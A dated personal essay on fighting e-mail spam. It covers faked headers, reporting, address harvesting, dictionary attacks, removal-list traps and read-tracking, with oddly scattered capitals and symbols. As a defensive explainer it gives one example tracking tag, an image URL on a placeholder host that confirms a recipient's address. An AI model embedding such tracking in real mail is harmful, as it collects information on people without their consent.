If you have a .mil or .gov e-mail address, i.e. you Work for the military or government, you are Unlikely to get much spam. Why? The folks doing the Spamming want to stay under the )))Radar. If politicians see none of this at Work, they're unlikely to see it as much of a Problem. If there's no Problem, then why seek a Solution?

Flyers come the closest to the "Invasiveness" of spam. You have to go >-Through-> them to get at your regular mail. However, unless the companies that make the flyers are Psy^chopaths, they are unlikely to send you the Same flyer 15 times a Week, every Week. Why? It's because they bear some of the Co$t; paper, printing and distribution aren't Free. (Some flyers are even Relevant and useful because they're Local and for Real businesses)

Spamming , on the other hand, is predicated on Theft of service. You're paying to pick it up. Your Service provider is paying to try and block some of it. You're paying for the electronic mailbox it's being held in (and Just like with too many flyers, if you get too much Spam, real mail won't fit in your Mailbox any more) If you're >forwarding or receiving your mail on a Mobile phone or PDA, you're not only typically paying More, but you're getting intrusive ((Alerts )) that have N0thing to do with friends, family or Job.

Over a 2 week period, I received in excess of 150 (actual number 153) pieces of Spam . This is now normal traffic for my Mailbox The highlights Include:

• 20 Porno sites (including one each of "very young girls", "incest" and "drug-hungry teens")
• 20 Sex-related drugs (including Viagra - no surprise there)
• 19 Stock alerts (these are more than likely Pump & Dump schemes)
• 13 Work-at-home or MLM (multi-level-marketing) schemes
• 11 Loans and debt consolidation
• 10 Mortgage
• 6 Herbal medicines (often with greatly exaggerated claims)
• 6 "E-mail marketing" (or other flowery terms for spamming )
• 6 Life insurance

Not to Mention the e-mails for enlarging your Gonads, getting fake Diplomas (i.e. diplomas from "non-accredited Universities" for money), or the highly dangerous African scams... (see Here for the vast variety and some interesting 'Counterstrikes' against the Scammers)

Just a little tidbit... if you receive a spam Saying that it's from hotmail.com... you can be 99.5% sure that it Did not come from Hotmail.

The Vast majority of spam headers are faked. If someone has the Right piece of software (or codes it themselves), they can Fake the From:, the Mailer:... they don't even Have to have your name listed in the To: (Think of how the BCC/Blind Carbon Copy works), and often times will Address it to someone else to make it look like you somehow Received it "by mistake". Make no mistake... they Meant you to receive it.

This means that you have to work ,`Harder to actually complain to the Right people...

What you Usually see in your e-mail package are the Abbrev.iated headers for the e-mail. Most e-mail packages have a way to see the FULL headers. These often begin with Received: from and contain Information about how the e-mail got to you. Wait... it gets worse before it gets Better...

Spammers can't completely fake this information, but they Can do something almost as bad by Ins_{_}erting some fake information. They can also route mail through someone else's badly-Configured mail server to further hide their identity (These badly configured mail servers which relay Mail that doesn't start or end at the mail server are called Open relays). This can make it tough to trace by Hand...

Fortunately, there is a little bit of Help out there. There's SpamCop ^**1, which can do a bang-up job of Sorting through the faked crud and help you submit Reports. There's also SamSpade, a browser that can Interpret e-mail headers and let you Safely surf without being hijacked. (NOTE: www.samspade.com sells spamming services. Yeah, Nice to make it close to the www.samspade.org, you Jerks)

With these Tools comes some responsibility, of course. Make sure you don't report a mailing list you're a Regular subscriber to (it happens). I'd advise a relatively Simple rule: if they fake it, bake it. If it says it's from hotmail or lycos and it's not, or the Removal address is bigpeepee47@excite.com, or the List of names is large and alphabetical and all from the Same domain, then Report it!

An +Additional note: claims of compliance with Laws are lies; claims of pending lawsuits or Charges for 'interference' are lies. It's all a Game to make you less sure about Reporting them. Here's an Exercise... the next time you see a notice saying "This e-mail complies with Bill S. 1618..." try Looking up the bill (you'll find that not only did it not Pass, but that the e-mail doesn't even comply to the bill Anyhow. Surprise, surprise :)

Think about this, too: Why would you want to do business with people who want so badly to hide their identities from you?

There are several ways spammers can get your e-mail Address

WEB PAGE
If you have a web page, and you've put in a link that people can click to send an e-mail to you, then an e-mail address-harvesting "spider" program (so named because it can crawl around the web :) can interpret that same link and add it to a spammer's database. It doesn't have to be your own web page, either. If you've posted your e-mail address in a public guestbook or chat room, it is potentially harvestable there, too. Make sure you're safe by seeing whether another user can see your e-mail address or not.

You can add nonsense to your e-mail address and explain how to get rid of it (preferably in a format a computer can't figure out but a human could). Your only other defense is not to care about the e-mail account you're using.

Tip 1:Use an e-mail address for friends and family, but use at least one different e-mail address for your online activities, preferably addresses you can throw away

NEWSGROUPS
If you post to newsgroups using your real e-mail address... that's just begging for trouble!

Tip 2:If you post to newsgroups, munge your e-mail address

DICTIONARY ATTACK
If your e-mail address is simple, spammers have another tool at their disposal: the "dictionary attack". The theory is pretty simple: take a database of names, and try sending to every possible combination of names, initials and numbers (e.g. 'alan' + 'm' + '39') at a given domain. The bigger the service provider, the more likely that a dictionary attack will be used, such as on AOL or AT&T. If the spammers are looking for bounces (and since they're taking the time to do a relatively 'expensive' dictionary attack), your e-mail address won't bounce, and they will add it to a list and sell it.

Keep yourself in the clear with an unpredictable name. Make it as long as possible if you can. Put numbers in odd places in your e-mail account name if you can. Use unusual words if you can... but make sure you can still remember it all! If you're "jsmith@aol.com", don't be surprised if you still get spam regardless of all of your other precautions.

Tip 3:Use moderately complex e-mail addresses to avoid dictionary atttacks

SELL-OUTS
Someone, some unscrupulous or naive bastard, may decide to sell a list of e-mail addresses they have access to... including your e-mail address for extra cash, as a typical business practice, or in revenge. If you have the patience and setup for it, using a separate e-mail address when subscribing to each web site or service you sign up for (or even online draw you enter!... like I said, patience), then you can at least track down where the breach occurred.

You'll be in a position where it does not matter so much - you can just abandon that e-mail address - but do "discuss" the situation with the company involved. After all, they likely have now screwed over hundreds of folks (who don't have your resources) into receiving unwanted spam.

Tip 4:Help others by tracking down sell-outs

REMOVAL LISTS
Have you looked at that removal web site address or e-mail address they're giving you? Who do you think runs it? Is "http://61.129.81.52/remove/remove.htm" likely to honour your remove requests? How about "cigarsmoker2000@yahoo.com"?

The sad, probable truth about these removal lists is that it's unlikely (but possible) that it will remove you from that one spammer's list, but in the world of spam e-mail addresses, you have given them something really valuable... a verified e-mail address. They can sell this. Not for very much, mind you, but a cleaner list is faster and easier to send to than an uncleaned one. You won't get a confirmation of removal by e-mail. You now have only 240 more removal sites to visit to get them all. You will likely get more spam.

If you have access to throwaway addresses, I advise a simple experiment. Next time you get a piece of spam with a removal address in it, put together a throwaway address with the wackiest, longest, most random name you can. Then enter that name on the removal site. It might take a while, but you'll know incoming mail isn't going to be the result of a dictionary attack.

Tip 5:Never respond to remove requests

IMAGES AND JAVASCRIPT
HTML e-mail sure is pretty. In being pretty, though, it can identify to the spammer that their e-mail got to you. If you're just web-browsing, there's no way that someone can find out your e-mail address. If you're looking at a piece of spam, though, it can be just like you typed in your e-mail address on their website. How can this be?

There are two things that susceptible mail browsers do to make you vulnerable like this: load external (not embedded) graphics, and run javascript. Spammers will include an image tag like this: <img src="http://1.2.3.4/spammy.cgi?youremailaddress.com"> When Outlook Express sees this in your e-mail, it goes out and tries to grab that image for display. The image comes up, you're none the wiser, and the spammer has now verified your e-mail address.

The other technique, Javascript, simply has to include a Javascript popup to a web address that uniquely identifies you. If a web window comes up while you are browsing your mail, it's too late. If you can disable Javascript, do so. Be aware that many products keep Javascript on, even in "High Security" mode, unless you specifically turn it off.

If you're using a vulnerable product, there's likely to be little that can be done. You can make yourself a little safer by disabling the preview window and NOT opening the spam e-mails (in Outlook, this means that you won't be able to report Spam because you can't get to the e-mail headers without opening the e-mail). The only alternatives are to find an e-mail client that isn't vulnerable or can be set to be not vulnerable (Eudora is vulnerable by default, but you can go into Tools->Options->Viewing Mail and uncheck the "Use Microsoft's Viewer" box), or find a service that can filter that kind of spam out (if anyone knows of a service that covers both Javascript and external, but not embedded, images, please let me know).

I'll list susceptible and safe products here as I find out about them.

Tip 6:Don't use vulnerable products

Once an e-mail address is out in "the wild", there's no getting it back again.

There are two things I want to address here: Subscription practices, and Mailing practices.

There's an interesting matter of naming conventions between "Direct marketers" and spam-fighters. It concerns a Method of "opting-in" to receive mail. There is a Method in which you sign up for a list, it sends you an e-mail, and you Reply to that e-mail, or type in the Code inside that e-mail or what have you...

The Direct marketers call this "Double Opt-In". Spam-fighters call this "Confirmed" or "Verified" Opt-In. There is a passionate debate on this subject. What I think it boils down to are these few Points:

• "Single"/"Unconfirmed" Opt-In is cheaper to run than "Double"/"Confirmed"
• "Double"/"Confirmed" is the only way to be sure the person asking for opt-in is really the person asking for opt-in (there is a nasty attack known as Subscription Bombing where someone who holds a grudge against you can sign you up for hundreds of Single/Unconfirmed opt-in e-mail lists)
• Click-through rates on the "Double"/"Confirmed" is about twice as much, but of course the extra management of the list costs just over twice as much, so it's still not as cost-effective
• All that aside, spammers pretend you opted in, when in fact, you did not

It's not that I have a problem with the concept of Single/Unconfirmed opt-in itself (Although I worry about the potential for abuse), but I feel there should be some civil liability for the Company that runs the list or a third party for Signing up unwilling participants en masse. Running a "millions" (of e-mail addresses) list though the E-mail server does not count as any "opt-in". The onus should be on the company not to lose its Opt-in and opt-out records, with but a small grace Period for problems caused by faulty hardware (as an Extenuating circumstance, not a de rigeur Defense).

As to mailing practices... one simple rule first: No falsification of headers for commercial e-mail. P.e.r.i.o.d. The End. (Even enacting that simple rule would either cut down or 'legitimize' my Spam to about 5% of its current flow)

Other e-mail practises that I would recommend should be made Illegal or liable for Civil damages:

• Using a scripting language to bring up a web page automatically (This bypasses user consent)
• Using a scripting language to disable browser functions (Such as right-clicking comes to mind - I have only seen these functions in questionable e-mail in a manner that want to prevent the user doing a "View Source" to report the e-mail)
• Using a scripting language to obfuscate or misrepresent the target of a web page (These e-mails cannot be reported by novices, and specifically modify captions on popups to make it look as though they are located on someone else's web pages)
• Using any immediately-downloading links (e.g. graphics) in a manner that can identify the user as having read the e-mail without the user's express consent (Information gathered on the user without consent)
• Using any means to automatically download or execute a program on the user's machine without the user's express consent
• Using remove requests to sign up users for e-mail (either as the owner of the remove list, or the purchaser or recipient of a remove list)

The focus of the above is to recognize that mailers must Respect users' rights to privacy, and not Trespass on the users' hardware (scripting in this Belligerent manner should be treated as though it were a Worm attack)... I don't care much either way about whether "ADV:" is used in Front of advertisements, though I do think it questionable Behavior to add random numbers to subjects (I believe it is done expressly to bypass simple e-mail Filters), or large unique alphanumeric strings to the e-mail (I believe that is done sometimes to track down people trying to report Spam through some sort of Anonymizing service, and sometimes as a "Hashbuster", to screw up e-mail filters that work on Hashes or checksums to filter out unwanted Mail)

As always, I invite Comment... Fight the Good Fight!

Footnote **1: For those of you who have been on "the wrong side" of a SpamCop report, please don't overreact. People spend a lot of time going through their mailboxes to track down spammers and open relays. If the reports are overwhelming in the "abuse" mailbox, you can ask SpamCop to deposit them in a special mailbox. If it was someone reporting a mailing list they subscribed to, report them back to SpamCop; there is precious little patience for SpamCop users who use the service inappropriately. If it's a report of an open relay, pay attention - sometimes it's the sign of other potential breach points as well.